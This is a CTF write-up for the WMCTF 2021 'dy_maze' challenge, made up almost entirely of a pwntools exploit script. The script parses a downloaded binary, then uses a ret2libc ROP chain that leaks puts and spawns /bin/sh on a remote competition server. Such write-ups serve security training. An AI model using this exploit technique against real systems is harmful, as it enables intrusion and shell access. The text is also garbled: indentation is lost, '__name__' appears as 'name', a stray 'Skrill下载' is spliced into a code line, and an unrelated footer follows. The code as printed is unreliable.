WMCTF 2021 pwn dy_maze writeup

from pwn import *
from LibcSearcher import *
from binascii import a2b_base64
import os
context(log_level='debug', os='linux', arch='amd64', bits=64)
context.terminal = ['/usr/bin/x-terminal-emulator', '-e']

Interface

local = False

binary_name = "dy_maze"

binary_name = "38a5a00c-08ac-11ec-b124-0242ac110003"
port = 44212
if local:

p = process(["./" + binary_name])
e = ELF("./" + binary_name)
# libc = e.libc

else:

p = remote("47.104.169.32", port)

def z(a=''):

if local:
    gdb.attach(p, a)
    if a == '':
        raw_input()
else:
    pass

ru = lambda x: p.recvuntil(x)
rc = lambda x: p.recv(x)
sl = lambda x: p.sendline(x)
sd = lambda x: p.send(x)
sla = lambda delim, data: p.sendlineafter(delim, data)
def encode(payload, offset):

# encode
payload_encoded = b''
for i in range(len(payload)):
    payload_encoded += (payload[i] ^ success_temp[(i + offset) % 5]).to_bytes(1, 'little')
return payload_encoded

Others

success_temp = []

Main

if name == "__main__":

# z('b maze_25')
z('b ok_success\n')

initialize

p.recvuntil(b'Solution?')
confirm = input()
sl(confirm)

Create binary file

ru(b'Binary Download Start')
ru(b'\n')
b64_data = p.recvuntil(b'\n==', drop=True)
with open('temp.bz2', 'wb') as f:

f.write(a2b_base64(b64_data))

ru(b'\n')
temp_binary = Skrill下载os.popen('tar -xjvf temp.bz2').read().strip('\n')
e = ELF("./" + temp_binary)

# Start ELF Analysis
d = {}
for i in range(1, 81):
    d[i] = e.symbols['maze_{}'.format(i)]
maze_address = sorted(d.items(), key=lambda x: x[1])
key = {}
for ind, addr in zip(range(80), e.search(b'\x83\xc0\x01')):
    addr -= 4
    while e.data[e.vaddr_to_offset(addr): e.vaddr_to_offset(addr) + 3] != b'\x83\x7d\xfc': addr -= 1
    key[maze_address[ind][0]] = e.data[e.vaddr_to_offset(addr) + 3]
for addr in e.search(b'\x48\x98\x88\x54\x05\xEC'):
    success_temp.append(e.data[e.vaddr_to_offset(addr) - 1])
prdi = next(e.search(b'\x5f\xc3'))
# End Analysis
# key[80] = 32
payload = b''
for i in range(1, 81):
    payload += str(key[i]).encode('utf-8') + b' '
# ok_success
payload += str(100).encode('utf-8')    
sl(payload)
sleep(2)
# p.recvall()
ru(b'Good')
# sl(b'100')
sleep(2)
# input your name:
payload = b'a' * 0x14 + b'b' * 8 + p64(prdi) + p64(e.got['puts']) + p64(e.plt['puts']) + p64(e.symbols['ok_success'])
sl(encode(payload, 0))
# sl(payload)
sleep(2)
ru(b'name: ')
puts_addr = p.recvuntil(b'\n', drop=True).ljust(8, b'\x00')
puts_addr = u64(puts_addr)
log.success("puts addr found: " + hex(puts_addr))
libc = LibcSearcher('puts', puts_addr)
# libc.select_libc(9)
libc_base = puts_addr - libc.dump('puts')
log.success('libc base found: ' + hex(libc_base))
p.sendlineafter(b'length', str(100).encode('utf-8'))
# Attacking:
payload = b'a' * 0x14 + b'b' * 8 + p64(prdi) + p64(libc.dump('str_bin_sh') + libc_base)
payload += p64(prdi + 1) + p64(libc.dump('system') + libc_base)
sla(b'name: ', encode(payload, 1))
p.interactive()

你可能感兴趣的:(python)